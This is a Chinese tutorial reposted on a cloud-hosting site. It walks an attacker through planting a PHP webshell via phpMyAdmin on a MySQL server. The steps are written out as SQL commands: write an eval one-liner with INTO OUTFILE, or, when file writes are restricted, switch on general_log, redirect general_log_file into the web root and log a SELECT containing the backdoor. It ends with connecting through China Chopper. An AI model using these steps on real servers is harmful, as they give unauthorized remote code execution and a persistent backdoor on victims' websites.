phpmyadmin中getshell有什么用

发布时间:2020-12-30 09:22:18 作者:小新
来源:亿速云 阅读:206

这篇文章主要介绍了phpmyadmin中getshell有什么用,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。

phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。

通俗的讲 其作用就是可以在web页面方便的操作数据库。

当我们得到一个站点的phpmyadmin页面时,下一步要做的就是getshell。

可以通过写shell进行提权,而我们需要满足以下条件:

1.数据库root权限

2.知道网站的物理路径

3.数据库有写权限

通过  select '<?php eval($_POST=[123];)?>' INTO OUTFILE '网站物理路径' 写入shell

本文主要讲的是在条件3不满足的情况下成功getshell。

利用条件:MySQL 5.0+

MySQL 5.0+的版本会自动创建日志文件,那么在服务运行的情况下修改全局变量也是可以变动文件位置的,但是必须要对生成日志的目录有可读可写的权限。

(Linux环境下可能会比较苛刻,因为站点目录是一个用户,MySQL是另外一个用户,权限管控较为严格,主要取决于权限配置是否得当)

首先我们测试站点是否有写权限

执行sql语句               SHOW VARIABLES LIKE 'secure_file_priv'

phpmyadmin中getshell有什么用

phpmyadmin中getshell有什么用

sql语句 SHOW VARIABLES LIKE 'secure_file_priv'  进行查询 查找secure_file_priv

secure-file-priv特性
secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。

可以在mysql-ini文件中设置其属性

phpmyadmin中getshell有什么用

经测试,我们没有写权限

phpmyadmin中getshell有什么用

然后再介绍两个MySQL全局变量(general_log、general_log file

  1. general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。

  2. general log file 指的是日志的保存路径。

我们可以通过将一句话木马写入mysql日志中然后移动mysql日志路径到网站目录下实现getshell

执行sql语句   SHOW VARIABLES LIKE 'general_log%'  进行模糊查询

phpmyadmin中getshell有什么用

日志默认关闭

我们执行sql语句

set global general_log = "ON";     #开启日志
SET global general_log_file='网站下物理路径';  #更换日志路径

phpmyadmin中getshell有什么用

成功创建

phpmyadmin中getshell有什么用

phpmyadmin中getshell有什么用

然后执行特殊的查询语句

select  '<?php eval($_POST[aaa]);?>'

phpmyadmin中getshell有什么用

我们进入112233.php进行验证,成功写入shell

phpmyadmin中getshell有什么用

最后进行菜刀连接,获得站点webshell

phpmyadmin中getshell有什么用

感谢你能够认真阅读完这篇文章,希望小编分享的“phpmyadmin中getshell有什么用”这篇文章对大家有帮助,同时也希望大家多多支持亿速云,关注亿速云行业资讯频道,更多相关知识等着你来学习!

推荐阅读:
  1. 蚂蚁分类getshell
  2. 帝国cms 后台getshell

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

phpmyadmin mi

上一篇:计算机中端口被占用的解决方法

下一篇:如何卸载电脑上的office

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》